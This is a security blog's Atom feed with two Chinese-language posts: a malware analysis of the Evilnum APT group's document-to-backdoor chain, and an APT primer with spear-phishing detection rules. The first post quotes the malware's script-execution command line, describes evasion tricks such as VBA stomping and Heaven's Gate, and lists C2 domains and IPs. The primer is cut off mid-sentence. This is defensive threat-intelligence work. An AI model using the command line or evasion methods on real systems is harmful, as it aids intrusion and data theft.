-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathatom.xml
479 lines (275 loc) · 764 KB
/
atom.xml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>Mr.Guo</title>
<icon>https://www.gravatar.com/avatar/46378062b1742d8202e853f79672c7c4</icon>
<subtitle>信息安全小白</subtitle>
<link href="/atom.xml" rel="self"/>
<link href="https://github.com/gha01un/gha01un.github.io/"/>
<updated>2022-10-16T08:35:01.088Z</updated>
<id>https://github.com/gha01un/gha01un.github.io/</id>
<author>
<name>Mr.Guo</name>
<email>[email protected]</email>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>Evilnum APT组织近期攻击行为总结</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/10/14/Evilnum%20%E7%BB%84%E7%BB%87%E8%BF%91%E6%9C%9F%E6%94%BB%E5%87%BB%E8%A1%8C%E4%B8%BA%E7%9A%84%E6%80%BB%E7%BB%93/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/10/14/Evilnum%20%E7%BB%84%E7%BB%87%E8%BF%91%E6%9C%9F%E6%94%BB%E5%87%BB%E8%A1%8C%E4%B8%BA%E7%9A%84%E6%80%BB%E7%BB%93/</id>
<published>2022-10-14T07:09:39.778Z</published>
<updated>2022-10-16T08:35:01.088Z</updated>
<content type="html"><![CDATA[<p>啊好难找啊!kpi–!!</p><a id="more"></a><h3 id="组织介绍"><a href="#组织介绍" class="headerlink" title="组织介绍"></a>组织介绍</h3><p>Evilnum 组织因使用 Evilnum 恶意软件而闻名,该组织最初于 2018 年被安全公司所披露。Evilnum 组织擅长对受害者目标使用鱼叉式网络钓鱼电子邮件,主要针对整个欧洲的金融科技公司。由于金融公司多数需要身份信息来验证注册,因而用于钓鱼邮件的附件通常使用扫描信用卡、水电费账单、身份证、驾驶执照和其他身份信息图片来作为诱饵内容。 Evilnum 专注于间谍活动,企图从目标单位企业获取财务信息,包括:客户列表和投资 及交易信息的文档、演示文稿、交易软件的凭证、浏览器数据、电子邮件登录信息、客户信用卡数据、甚至 VPN 配置等。自 2022 年初以来,Evilnum APT 组织的攻击行为一直在被各个国家密切监视。过程中发现他们针对英国和欧洲地区的国家发起的小规模针对性攻击活动的几个实例。近期的攻击行为使用最新的战术、技术和程序。在 2021 年观察到的早期活动中,该APT组织使用的主要分发媒介是 Windows 快捷方式文件 (LNK)或恶意文本文档 (ZIP) 作为电子邮件附件发送给受害者。在最近的例子中,攻击者已经开始使用 MS Office Word 文档,利用文档模板注入将恶意负载传送到受害者的机器上。</p><h3 id="攻击手法"><a href="#攻击手法" class="headerlink" title="攻击手法"></a>攻击手法</h3><ul><li>Evilnum APT 组织的主要目标集中在金融科技(金融服务)领域,特别是在英国和欧洲处理贸易和合规的公司。</li><li>2022 年 3 月,Evilnum APT 组的目标选择有重大更新。他们瞄准了一个处理国际移民服务的政府间组织。</li><li>袭击的时间线和选定目标的性质与俄乌的冲突相吻合。</li><li>攻击者以“通用数据保护条例 (GDPR)”为诱饵针对 KOT4X 单位进行鱼叉攻击,除此还有身份验证信息类型诱饵。</li><li>诱饵文档采用 LNK 加载 JS 代码的方法执行恶意代码,LNK 文件包含 JS 代码、PDF、 EXE 等数据,经过 JS 代码多层解密后执行最后的后门程序,整体分多个阶段执行,复杂程度较高。</li><li>载荷具备反调试、检测杀软的功能,多个阶段的载荷都有延迟代码,在获取最终阶段的载荷失败,则会等待 3 个小时后再次运行,这意味着该后门将隐蔽性放在第一原则。</li><li>模板注入阶段使用的是基于宏的文档利用 VBA 代码技术,企图绕过静态分析以防止逆向技术。</li><li>使用严重混淆的 JavaScript 解密并丢弃端点上的有效负载。JavaScript 配置了一个计划任务来运行已删除的二进制文件。与 EvilNum APT 组织使用的先前版本相比,此 JavaScript 在混淆技术方面有着显著改进。</li><li>在执行过程中创建的所有文件名称都是由攻击者仔细构造的,以欺骗合法的 Windows 平台和其他第三方二进制文件检测工具。</li><li>在每个新实例中,APT 组织使用与行业垂直目标相关的特定关键字注册多个域名。</li></ul><img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756798.png" alt="image-20221011174914153" /><h3 id="样本分析"><a href="#样本分析" class="headerlink" title="样本分析"></a>样本分析</h3><h4 id="第-1-阶段:恶意文档"><a href="#第-1-阶段:恶意文档" class="headerlink" title="第 1 阶段:恶意文档"></a>第 1 阶段:恶意文档</h4><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151801322.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>主题的选取上延续了Evilnum在之前的行动中诱饵文件使用过的类似文件名,意为所有权证明。这些样本文档制作比较粗糙,包括本样本在内的一系列样本都是利用CVE-2017-0199来进行恶意行为执行,但内容却是诱导受害者打开Office宏的图。Evilnum在之前的行动中使用过这类诱导图片,不过本次未作修改就应用在这些样本中。</p><img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756945.png" alt="image-20221009135954769" /><h4 id="第-2-阶段:宏模板-VBA-代码清除技术"><a href="#第-2-阶段:宏模板-VBA-代码清除技术" class="headerlink" title="第 2 阶段:宏模板 [VBA 代码清除技术]"></a>第 2 阶段:宏模板 [VBA 代码清除技术]</h4><p>模板包含主要的恶意宏代码。它利用了相当少见的 VBA 代码清除技术。这种技术会破坏源代码,并且仅将 VBA 宏代码(也称为 p 代码)的编译版本存储在文档中。因此,这种技术可以防止 olevba 等静态分析工具提取反编译的 VBA 代码。</p><p>使用沃尔玛团队提出的VBA Stomping — Advanced Maldoc Techniques技术,我们能够提取完整的宏代码。</p><p>宏代码中的所有字符串均使用如图所示的字符串解密函数进行解密。</p><img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756466.png" alt="image-20221014150715577" /><p>以下是宏的主要功能。</p><p><strong>1.</strong>文档文件有两个文本框,内容是加密的。这些文本框将在运行时由 VBA 宏代码解密。</p><p>a) 文本框 1 - <strong>msform_ct.TextBox1.Text</strong>。这将被解密并将内容写入<strong>%appdata%"ThirdPartyNotices.txt”</strong></p><p>b) 文本框 2 - <strong>msform_ct.TextBox2.Text</strong> - 这将被解密并将内容写入“ <strong>%appdata%\Redist.txt</strong> ”</p><p><strong>2.</strong>将合法的 Windows 二进制<strong>Wscript.exe</strong>复制到名为“ <strong>msdcat.exe</strong> ”的文件中。此类文件复制操作是由恶意软件完成的,以此作为绕过端点安全产品的一种方式。</p><p><strong>3.</strong>文件 - Redist.txt 包含将使用以下命令行执行的经过混淆的 JavaScript:</p><p><strong><em>msdcat.exe” /E:jscRipt “%appdata%\Redist.txt” dg ThirdPartyNotices.txt\</em></strong></p><p><strong>注意:</strong> “dg”是存在于 VBA 宏代码中的硬编码命令行参数。</p><p><strong>4.</strong> VBA宏代码执行过程中,多次调用doc.Shapes.AddPicture()从攻击者控制的服务器获取JPG图片。我们认为这是攻击者为了跟踪和记录端点上代码的执行而完成的。</p><p>图中显示了一个这样的示例。在命令行的构建和命令行的执行之间存在对 doc.Shapes.AddPicture() 的调用。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756024.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="第-3-阶段:去混淆和分析"><a href="#第-3-阶段:去混淆和分析" class="headerlink" title="第 3 阶段:去混淆和分析"></a>第 3 阶段:去混淆和分析</h4><p>我们将重点介绍一些在混淆的 JavaScript 中很少观察到的独特混淆技术。在执行时使用以下命令行向此 JavaScript 传递了两个参数:</p><p>msdcat.exe” /E:jscRipt “C:\Users\user\AppData\Roaming\Redist.txt” dg ThirdPartyNotices.txt</p><p><strong>参数 1</strong>:“dg”,此字符串稍后用于 JavaScript 中的字符串解密函数。</p><p><strong>参数 2</strong>:文件“thirdpartynotifications .txt”包含加密代码,将由JavaScript解密并删除文件系统上名为SerenadeDACplApp.exe的文件。</p><p>大多数混淆技术涉及大量加密和编码字符串,这些字符串在整个代码中使用索引进行引用。进行去混淆的常用方法需要多次“检索和替换”操作,其中将引用替换为实际解密和解码的字符串。</p><p>在这种情况下,JavaScript使用了一种有趣的技术,原始字符串数组被打乱,执行时在内存中也被打乱。因此,在不打乱数组的情况下解密引用字符串的任何尝试都将导致错误。这样的方法可以用来阻止逆向工程,也可以绕过一些试图自动化去混淆的工具。</p><p>下面的图中显示了在 JavaScript 开头定义的巨大字符串数组。这个数组被包裹在一个函数中,作为一个额外的混淆层。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756214.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>下一步是解密混淆数组。下图中显示了相关的 JavaScript 代码,该代码使用粗略近似法来解密混淆数组。它有一个预定义的种子值“0x6467a”。在每次迭代中,该函数使用如下图所示的算法去计算一个种子,并将其与预定义的种子“0x6467a”进行比较,如果不满足条件,该函数继续将数组的内容向右移动一个位置,直到满足此条件。代码中包含相关注释以说明其逻辑。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756173.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>用于混淆的其他技术包括控制流扁平化技术,下图显示了一种使用这种混淆技术的字符串解密函数。使用 switch-case 对解密步骤的顺序进行打乱,并遵循以下顺序:</p><p>“15|12|3|2|14|5|1|10|9|17|8|7|6|4|13|16|0|11”</p><p>这意味着,最先执行“case 15”,然后执行“case 12”,依此类推。最后的“case 11”返回解密后的字符串。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756616.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h4 id="第-4-阶段:丢弃二进制文件(加载程序)"><a href="#第-4-阶段:丢弃二进制文件(加载程序)" class="headerlink" title="第 4 阶段:丢弃二进制文件(加载程序)"></a>第 4 阶段:丢弃二进制文件(加载程序)</h4><p>正如上节所述,JavaScript 删除了两个文件:</p><p><strong>a)</strong>一个可执行文件 (SerenadeDACplApp.exe) </p><p><strong>b)</strong>二进制文件 (devZUQVD.tmp) </p><p>上边的exe文件由计划任务连同所需的参数一起执行。在执行过程中,它执行以下操作:</p><p><strong>1.</strong>执行命令行提取要加载的二进制文件</p><p>加载程序检查命令行是否以 ( <strong>“</strong> ) 结尾。如果为真,则终止进程,否则将解析参数以提取要加载的二进制文件。 </p><p><strong># 提取文件名有两种代码逻辑</strong></p><ul><li>如果第一个参数具有格式 ( <strong>–[char]=[char]*</strong> ),则加载程序将从该参数字符串中删除前 5 个字符,在其<strong>前面加上“dev”</strong>并<strong>附加“.tmp”</strong>。生成的字符串用作已删除二进制文件的文件名。</li></ul><p> <strong>例子:</strong></p><p> <strong>参数字符串:</strong> –E=nThisIsUsedInFileName</p><p> <strong>提取的文件名:</strong> devThisIsUsedInFileName.tmp</p><ul><li>第二个参数字符串用作已删除二进制文件的文件名</li></ul><p><strong>2.</strong>使用Heaven’s gate技术调用NtOpenFile API创建文件句柄</p><p><strong>3.</strong>使用 RtlAllocateHeap API 为读取文件内容分配内存</p><p><strong>4.</strong>使用Heaven’s gate技术调用NtReadFile API读取文件内容到分配的内存</p><p><strong>5.</strong>解密文件内容</p><p><strong># 加密内容格式</strong></p><p>XOR 密钥长度(1 字节)+ XOR 密钥 + 加密内容大小(4 字节)+ 加密内容</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756926.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>解密后的内容原来是一个 PE 文件,它使用自定义格式来存储 PE 标头和节标头信息。</p><p><strong># 解密内容格式</strong></p><p>自定义 PE 标题(+ 自定义部分标题 + 部分数据)*部分数量</p><p><strong>#PE头格式</strong></p><p>解密内容的开始以及 PE 标头(1 字节 - 00)+ 图像基础(4 字节)+ 图像大小(4 字节)+ 入口点(4 字节)+ 节数(4 字节)+ 到第一节的偏移量解密内容开头的信息(4 字节)+ 解密内容的大小(4 字节)</p><p><strong># 节头格式</strong></p><p>节号标记(1 字节)+ 节 RVA(4 字节)+ 节 VirtualSize(4 字节)+ 未知(4 字节)</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756554.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>7.</strong>使用Heaven’s gate技术调用NtAllocateVirtualMemory API 为要映射的PE文件分配内存。 </p><p><strong>注意:</strong>大小取自上述 PE 标头格式。</p><p><strong>8.</strong>映射内存中的PE文件。</p><p><strong>9.</strong>使用Heaven’s gate技术调用NtCreateThreadEx API 创建一个线程指向映射PE 的入口点。</p><p><strong>注意:</strong>加载程序使用天堂之门技术来逃避端点安全产品以及系统调用或 API 监控应用程序。它使用自定义标头格式来阻止对 PE 标头或节标头模式的内存扫描,并且还难以将 PE 文件作为独立的可执行文件进行转储和分析。</p><h4 id="第-5-阶段:映射-PE(后门)"><a href="#第-5-阶段:映射-PE(后门)" class="headerlink" title="第 5 阶段:映射 PE(后门)"></a>第 5 阶段:映射 PE(后门)</h4><p><strong>1.</strong>解密后门包括:</p><p>a) C2 域名</p><p>b) 用户代理相关字符串</p><p>c) 网络路径</p><p>d) Referrer strings</p><p>e) Cookies </p><p><strong>2.</strong>解析从配置中检索到库的 API 地址</p><p><strong>3.</strong>对生成的字符串进行加密和Base64编码</p><img src="https://raw.githubusercontent.com/gha01un/PicGo/main/img/202210151756434.png" alt="image-20221014150911224" /><p><strong>4.</strong>通过从配置中选择一种 cookie,将编码字符串嵌入 cookie 标头字段中。</p><h4 id="网络通讯"><a href="#网络通讯" class="headerlink" title="[+] 网络通讯"></a><strong>[+] 网络通讯</strong></h4><p>完成以上所有操作后。后门从配置中选择一个 C2 和一个路径,并发送网络请求。</p><p>如果请求成功,后门将向服务器查询可用内容并下载。</p><p>根据内容大小执行两种不同的操作:</p><p><strong>1.</strong>如果内容大小为4,则后门检查下载的数据是否等于<strong>“01”</strong>。如果为真,它会获取机器快照并通过 POST 请求将其发送到 C2 服务器。快照数据以加密形式泄露,cookie 标头包含附加信息。</p><p><strong># cookie头字符串的格式</strong></p><p>{</p><p>“u”:”{first_arg-user_id}”, “sc”:1, “dt”=”{snapshot_date_time}”</p><p>}</p><p><strong>2.</strong>如果内容大小大于4,则后门将下载的数据解密并执行。</p><h3 id="Indicators-of-compromise"><a href="#Indicators-of-compromise" class="headerlink" title="Indicators of compromise"></a><strong>Indicators of compromise</strong></h3><table><thead><tr><th><strong>MD5</strong></th><th><strong>Description</strong></th><th><strong>Filename</strong></th></tr></thead><tbody><tr><td>0b4f0ead0482582f7a98362dbf18c219</td><td>Document</td><td>proof of ownership.docx</td></tr><tr><td>4406d7271b00328218723b0a89fb953b</td><td>Document</td><td>tradersway compliance.docx</td></tr><tr><td>61776b209b01d62565e148585fda1954</td><td>Document</td><td>vantagemarkets documents.docx</td></tr><tr><td>6d329140fb53a3078666e17c249ce112</td><td>Document</td><td>vantagefx compliance.docx</td></tr><tr><td>db0866289dfded1174941880af94296f</td><td>Document</td><td>calliber docs (2).docx</td></tr><tr><td>f0d3cff26b419aff4acfede637f6d3a2</td><td>Document</td><td>complaince tfglobaltrading.docx</td></tr><tr><td>79157a3117b8d64571f60fe62c19bf17</td><td>Document</td><td>complaint europatradecapital.com.docx</td></tr><tr><td>63090a9d67ce9534126cfa70716d735f</td><td>Document</td><td>fxtm_compliance.docx</td></tr><tr><td>f5f9ba063e3fee25e0a298c0e108e2d4</td><td>Document</td><td>livetraderfx.docx</td></tr><tr><td>ea71fcc615025214b2893610cfab19e9</td><td>Loader</td><td>SerenadeDACplApp.exe</td></tr><tr><td>51425c9bbb9ff872db45b2c1c3ca0854</td><td>Encrypted binary</td><td>devZUQVD.tmp</td></tr><tr><td>3f230856172f211d5c9ed44ea783f850</td><td>zip</td><td>Docs010621.zip</td></tr><tr><td>87288fd98126fd4f7f2003c1103c3f2d</td><td></td><td></td></tr><tr><td>04918bae6c83b6307b9c6c2018da6991</td><td></td><td></td></tr><tr><td>82aea1d24b6a13d37586e2d14d9a71f3</td><td></td><td></td></tr><tr><td>87288fd98126fd4f7f2003c1103c3f2d</td><td></td><td></td></tr><tr><td>9c0e353c53a41e94709e928fefde6071</td><td></td><td></td></tr></tbody></table><table><thead><tr><th>IP</th></tr></thead><tbody><tr><td>185.161.208[.]64</td></tr><tr><td>185.161.208[.]194</td></tr><tr><td>185.161.209[.]97</td></tr><tr><td>185.161.209[.]170</td></tr><tr><td>185.161.208[.]209</td></tr></tbody></table><table><thead><tr><th>C2 Domains</th></tr></thead><tbody><tr><td>azure-ns[.]com</td></tr><tr><td>microsft-ds[.]com</td></tr><tr><td>afflaf[.]com</td></tr><tr><td>quanatomedia[.]com</td></tr><tr><td>webinfors[.]com</td></tr><tr><td>khnga[.]com</td></tr><tr><td>netwebsoc[.]com</td></tr><tr><td>infcloudnet[.]com</td></tr><tr><td>bgamifieder[.]com</td></tr><tr><td>bunflun[.]com</td></tr><tr><td>refinance-ltd[.]com</td></tr><tr><td>book-advp[.]com</td></tr><tr><td>mailservice-ns[.]com</td></tr><tr><td>advertbart[.]com</td></tr><tr><td>inetp-service[.]com</td></tr><tr><td>yomangaw[.]com</td></tr><tr><td>covdd[.]org</td></tr><tr><td>visitaustriaislands[.]com</td></tr><tr><td>traveladvnow[.]com</td></tr><tr><td>tripadvit[.]com</td></tr><tr><td>moreofestonia[.]com</td></tr><tr><td>moretraveladv[.]com</td></tr><tr><td>estoniaforall[.]com</td></tr><tr><td>bookingitnow[.]org</td></tr><tr><td>travelbooknow[.]org</td></tr><tr><td>bookaustriavisit[.]com</td></tr><tr><td>windnetap[.]com</td></tr><tr><td>roblexmeet[.]com</td></tr><tr><td>netrcmapi[.]com</td></tr><tr><td>meetomoves[.]com</td></tr><tr><td>bingapianalytics[.]com</td></tr><tr><td>azuredcloud[.]com</td></tr><tr><td>appdllsvc[.]com</td></tr><tr><td>udporm[.]com</td></tr><tr><td>pcamanalytics[.]com</td></tr><tr><td>nortonalytics[.]com</td></tr><tr><td>deltacldll[.]com</td></tr><tr><td>mscloudin[.]com</td></tr><tr><td>msdllopt[.]com</td></tr><tr><td>zerobitfan[.]com</td></tr><tr><td>edwardpof[.]com</td></tr><tr><td>totaledgency[.]com</td></tr><tr><td>mainsingular[.]com</td></tr><tr><td>apidevops[.]org</td></tr><tr><td>cloudreg-email[.]com</td></tr><tr><td>mailservicenow[.]com</td></tr><tr><td>namereslv[.]org</td></tr><tr><td>apple-sdk[.]com</td></tr><tr><td>dnstotal[.]org</td></tr><tr><td>msftcrs[.]com</td></tr><tr><td>sysconfwmi[.]com</td></tr><tr><td>apiygate[.]com</td></tr><tr><td>plancetron[.]com</td></tr><tr><td>msftmnvm[.]com</td></tr><tr><td>azurecfd[.]com</td></tr><tr><td>msftprintsvc[.]com</td></tr><tr><td>amazonpmnt[.]com</td></tr><tr><td>cloudamazonft[.]com</td></tr><tr><td>covidsrc[.]com</td></tr><tr><td>covidsvcrc[.]com</td></tr><tr><td>deuoffice[.]org</td></tr><tr><td>alipayglobal[.]org</td></tr><tr><td>worldsiclock[.]com</td></tr><tr><td>printfiledn[.]com</td></tr><tr><td>global-imsec[.]com</td></tr><tr><td>amzncldn[.]com</td></tr><tr><td>iteamates[.]com</td></tr><tr><td>checkpoint-ds[.]com</td></tr><tr><td>cloudhckpoint[.]com</td></tr><tr><td>philipfin[.]com</td></tr><tr><td>eroclasp[.]com</td></tr><tr><td>azurecontents[.]com</td></tr><tr><td>amznapis[.]com</td></tr><tr><td>amazonappservice[.]com</td></tr><tr><td>ammaze[.]org</td></tr><tr><td>thismads[.]com</td></tr><tr><td>mullticon[.]com</td></tr><tr><td>amazoncontent[.]org</td></tr><tr><td>tomandos[.]com</td></tr><tr><td>wizdomofdo[.]com</td></tr><tr><td>refsurface[.]com</td></tr><tr><td>picodehub[.]com</td></tr><tr><td>musthavethisapp[.]com</td></tr><tr><td>dnserviceapp[.]com</td></tr><tr><td>cloudazureservices[.]com</td></tr><tr><td>anyfoodappz[.]com</td></tr><tr><td>anypicsave[.]com</td></tr><tr><td>cargoargs[.]com</td></tr><tr><td>navyedu[.]org</td></tr><tr><td>msftinfo[.]com</td></tr><tr><td>invgov[.]org</td></tr><tr><td>covidaff[.]org</td></tr><tr><td>printauthors[.]com</td></tr><tr><td>rombaic[.]com</td></tr><tr><td>covsafezone[.]com</td></tr><tr><td>amazoncld[.]com</td></tr><tr><td>msftcd[.]com</td></tr><tr><td>govtoffice[.]org</td></tr><tr><td>covidgov[.]org</td></tr><tr><td>questofma[.]com</td></tr><tr><td>realshbe[.]com</td></tr><tr><td>govdefi[.]com</td></tr><tr><td>dogeofcoin[.]com</td></tr><tr><td>borisjns[.]com</td></tr><tr><td>travinfor[.]com</td></tr></tbody></table><table><thead><tr><th>Path</th></tr></thead><tbody><tr><td>/actions/async.php</td></tr><tr><td>/admin/settings.php</td></tr><tr><td>/admin/user/controller.php</td></tr><tr><td>/admin/loginauth.php</td></tr><tr><td>/administrator/index.php</td></tr><tr><td>/cms/admin/login.php</td></tr><tr><td>/backend/login/ajax_index.php</td></tr><tr><td>/wp-admin/media-new.php</td></tr><tr><td>/get.php</td></tr><tr><td>/auth/login</td></tr><tr><td>/admin/index.php</td></tr><tr><td>/actions/authenticate.php</td></tr><tr><td>/index.php</td></tr><tr><td>/admin/login.php</td></tr><tr><td>/wp-admin/admin-ajax.php</td></tr></tbody></table>]]></content>
<summary type="html">
<p>啊好难找啊!kpi–!!</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>APT浅析</title>
<link href="https://github.com/gha01un/gha01un.github.io/2022/08/18/APT%E6%B5%85%E6%9E%90/"/>
<id>https://github.com/gha01un/gha01un.github.io/2022/08/18/APT%E6%B5%85%E6%9E%90/</id>
<published>2022-08-18T07:35:39.402Z</published>
<updated>2022-08-18T09:07:50.556Z</updated>
<content type="html"><![CDATA[<h2 id="APT浅析"><a href="#APT浅析" class="headerlink" title="APT浅析"></a>APT浅析</h2><a id="more"></a><h3 id="APT攻击定义及手法"><a href="#APT攻击定义及手法" class="headerlink" title="APT攻击定义及手法"></a>APT攻击定义及手法</h3><p>APT:高级持续威胁(Advanced Persistent Threat),普遍认可的定义是,<strong>利用各种先进的攻击手段,对高价值目标进行的有组织、长期持续性网络攻击行为</strong>。也就是说很难去确定是不是APT攻击,只能从已发生过的APT攻击事件,分析其特点,进而与上述解释性概念相关联,得出APT攻击的一般规律。</p><p>APT组织常用的攻击手法有:鱼叉式网络钓鱼、水坑攻击、路过式下载攻击、社会工程学、即时通讯工具、社交网络等,在各大分析报告中出现最多的还是<strong>鱼叉式网络钓鱼、水坑攻击、社会工程学</strong>。</p><p>鱼叉式网络钓鱼(Spear phishing)指一种源于亚洲与东欧,只针对特定目标进行攻击的网络钓鱼攻击。当进行攻击的骇客锁定目标后,会以<strong>电子邮件</strong>的方式,假冒该公司或组织的名义寄发难以辨真伪之档案,诱使员工进一步登录其账号密码,使攻击者可以以此借机安装特洛伊木马或其他间谍软件,窃取机密;或于员工时常浏览之网页中置入病毒自动下载器,并持续更新受感染系统内之变种病毒,使使用者穷于应付。</p><p>水坑攻击(Watering hole)是一种<strong>计算机入侵手法</strong>,其针对的目标多为特定的团体(组织、行业、地区等)。攻击者首先通过猜测或观察确定这组目标经常访问的网站,并入侵其中一个或多个,植入恶意软件,最后,达到感染该组目标中部分成员的目的。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/18/rCT5suNkQbODoHm.jpg" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="平台上APT事件的理解"><a href="#平台上APT事件的理解" class="headerlink" title="平台上APT事件的理解"></a>平台上APT事件的理解</h3><p>由今年的台账可以得出几类常见的APT事件类型:</p><p>1.某某公司的内网IP地址解析APT组织”毒云藤”等的钓鱼域名</p><p>2.某某公司的内网IP地址存在大量主要连接海莲花等APT团伙关联IP的通讯行为</p><p>3.某某公司IP地址主动外联APT组织C2地址</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/YDRtLIPAMNXqogz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>对现有已知的APT组织例如”海莲花””毒云藤”等的相关恶意域名以及恶意IP(IOC)进行收集,形成自己的体系,以便于我们更好的在平台上抓取到APT相关信息。</p><h3 id="对于鱼叉式钓鱼防范的思考"><a href="#对于鱼叉式钓鱼防范的思考" class="headerlink" title="对于鱼叉式钓鱼防范的思考"></a>对于鱼叉式钓鱼防范的思考</h3><p>类似于报文规则,我们也可以适当的编写鱼叉式网络钓鱼的一些规则,通过对邮件协议的抓包,我们可以得到一些初步的结果。</p><p>当邮件的附件为exe且APT组织为毒云藤时,匹配如下:</p><p>Date: 匹配任意字符</p><p>From: 匹配任意字符@qq.com或者匹配任意字符@163.com或者匹配任意字符@foxmail.com或者匹配任意字符@Outlook.com或者Gmail.com</p><p>To: 匹配任意字符</p><p>Subject:包含 更新 或者 下载 或者 安装 或者 简历 或者 登入 或者 密码 或者 账户异常 或者 系统管理员 或者 通知 或者 告警 或者 订单 或者 采购单 或者 发票 或者 会议日程 或者 参会名单 或者 历届会议回顾 或者 密码重置 或者 验证 或者 整改 </p><p>关键字:</p><blockquote><p>“201”,“202”,“2022年”,“报”,“报告”,“兵”,“部队”,“对台”,“工作”,“规划”,“国”,“国际”,“航”,“合作”,“机”,“机场”,“基地”,“极地”,“军”,“军事”,“科技”,“密”,“内部”,“十”,“十三”,“台”,“台湾”,“铁路”,“无人”,“项”,“雪”,“研”,“运输”,“战”,“站”,“中”</p></blockquote><p>Content-Type: application/octet-stream;</p><p>name=”匹配任意字符.exe”</p><h3 id="海莲花-APT32的简单分析"><a href="#海莲花-APT32的简单分析" class="headerlink" title="海莲花-APT32的简单分析"></a>海莲花-APT32的简单分析</h3><p>“海莲花”,又名 APT32 和 OceanLotus,是越南背景的黑客组织。长期针对<strong>中国能源相关行业、海事机构、海域建设部门、科研院所和航运企业</strong>等进行网络攻击。<br>APT32 至少自 2018 年开始积极使用 KerrDown 下载器,用于投递 Cobalt Strike Beacon 等后门,针对中国和越南语用户进行攻击。<br>KerrDown 主要通过 MHT 格式的 DOC 文档,包含模板注入的 DOCX 文档,以及 ZIP 和 RAR 格式的压缩包进行投递。<br>KerrDown 包含多层 Shellcode,多会针对包含 Microsoft、Google、Adobe、Neuber 等公司有效签名的EXE进行 DLL 劫持。</p><h4 id="Microsoft-Word-白利用的攻击示例"><a href="#Microsoft-Word-白利用的攻击示例" class="headerlink" title="Microsoft Word 白利用的攻击示例"></a>Microsoft Word 白利用的攻击示例</h4><p>(CPLH-NHNN-01-2019.rar):该样本释放的诱饵文档及内容翻译如下图所示。可以看出是以越南国家银行为诱饵,疑似针对越南国家银行相关的分支机构进行定向攻击。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/5gvCEt9WZOBAn7Y.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://s2.loli.net/2022/08/17/ItC7hda6Ge2UBFj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><strong>Word 白利用</strong>是最常见的攻击手法,主要是因为 Word 可执行文件自带 Word 